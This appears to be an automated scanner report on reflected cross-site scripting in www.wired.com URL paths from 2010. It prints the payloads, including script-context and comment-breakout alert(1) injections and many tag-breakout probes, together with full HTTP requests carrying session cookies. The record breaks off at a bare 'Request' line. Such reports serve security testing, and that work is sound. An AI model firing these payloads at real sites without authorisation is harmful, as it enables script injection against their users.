Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /special_multimedia/2008/ff_futurefood_1611ebfab"-alert(1)-"73871f1db9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:59 GMT Date: Mon, 22 Nov 2010 01:12:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cec"><a>2ea48508115 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimedia/2008/ff_futurefood_1611b0cec"><a>2ea48508115 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:43 GMT Date: Mon, 22 Nov 2010 01:12:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <body class="s_special_multimedia ss_2008 c_ff_futurefood_1611b0cec"><a>2ea48508115"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload b8357--><script>alert(1)</script>dd4af33e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29404 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:37 GMT Date: Mon, 22 Nov 2010 01:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da586"><a>3aec687011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /supportda586"><a>3aec687011/feedback.html HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_supportda586"><a>3aec687011 ss_feedback.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5811a"><a>144635f756b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /support/feedback.html5811a"><a>144635f756b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29358 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:37 GMT Date: Mon, 22 Nov 2010 01:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_support ss_feedback.html5811a"><a>144635f756b"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a49de--><script>alert(1)</script>e92652d32ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29406 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:14:48 GMT Date: Mon, 22 Nov 2010 01:10:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /support/feedback.htmla49de--><script>alert(1)</script>e92652d32ce --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff7c9"><a>a3e95ddbbaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbizff7c9"><a>a3e95ddbbaf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29347 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Mon, 22 Nov 2010 01:15:36 GMT Date: Mon, 22 Nov 2010 01:11:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbizff7c9"><a>a3e95ddbbaf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71ee4"><a>10a4cbe8c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz71ee4"><a>10a4cbe8c8f/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29348 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Sun, 21 Nov 2010 20:04:42 GMT Date: Sun, 21 Nov 2010 20:00:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz71ee4"><a>10a4cbe8c8f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59d"><a>02f6b01dd4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz3f59d"><a>02f6b01dd4f/it HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:17:01 GMT Date: Sun, 21 Nov 2010 23:13:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz3f59d"><a>02f6b01dd4f ss_it"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b60b3"><a>63c96a35974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/itb60b3"><a>63c96a35974 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=564 Expires: Sun, 21 Nov 2010 23:22:55 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_itb60b3"><a>63c96a35974"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6b7"><a>d1b4a2e6128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz9c6b7"><a>d1b4a2e6128/it/magazine/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:10 GMT Date: Sun, 21 Nov 2010 23:13:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz9c6b7"><a>d1b4a2e6128 ss_it c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f14a"><a>4c2c28c6943 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/it3f14a"><a>4c2c28c6943/magazine/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=572 Expires: Sun, 21 Nov 2010 23:22:58 GMT Date: Sun, 21 Nov 2010 23:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_it3f14a"><a>4c2c28c6943 c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 765b7"><a>9a5bd1ea91f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/it/magazine765b7"><a>9a5bd1ea91f/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:44 GMT Date: Sun, 21 Nov 2010 23:13:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_it c_magazine765b7"><a>9a5bd1ea91f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdb7"><a>a468003d116 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbizabdb7"><a>a468003d116/media HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Sun, 21 Nov 2010 23:17:01 GMT Date: Sun, 21 Nov 2010 23:13:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbizabdb7"><a>a468003d116 ss_media"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fee9"><a>e9bf0f03e78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media7fee9"><a>e9bf0f03e78 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:32 GMT Date: Sun, 21 Nov 2010 23:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media7fee9"><a>e9bf0f03e78"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542e6"><a>86cc52af494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz542e6"><a>86cc52af494/media/news/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:28 GMT Date: Sun, 21 Nov 2010 23:13:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz542e6"><a>86cc52af494 ss_media c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b6b"><a>02038e56cc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media20b6b"><a>02038e56cc2/news/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:51 GMT Date: Sun, 21 Nov 2010 23:13:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media20b6b"><a>02038e56cc2 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5216c"><a>211e68f195d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media/news5216c"><a>211e68f195d/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:24:04 GMT Date: Sun, 21 Nov 2010 23:14:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media c_news5216c"><a>211e68f195d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cf"><a>2b48aae5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
